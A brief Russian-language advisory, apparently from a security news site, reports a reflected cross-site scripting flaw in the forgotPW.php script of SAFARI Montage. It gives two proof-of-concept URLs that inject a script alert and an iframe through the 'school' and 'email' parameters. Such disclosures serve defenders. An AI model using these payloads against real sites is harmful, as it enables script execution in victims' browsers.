Программа: SAFARI Montage 0

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием forgotPW.php. Атакующий может выполнить произвольный сценарий в
браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://www.example.com/SAFARI/montage/ forgotPW.php?school="><script> alert(1)</script>

http://www.example.com/SAFARI/montage/ forgotPW.php?email="><iframe src="http://www.example2.com">

Оставить мнение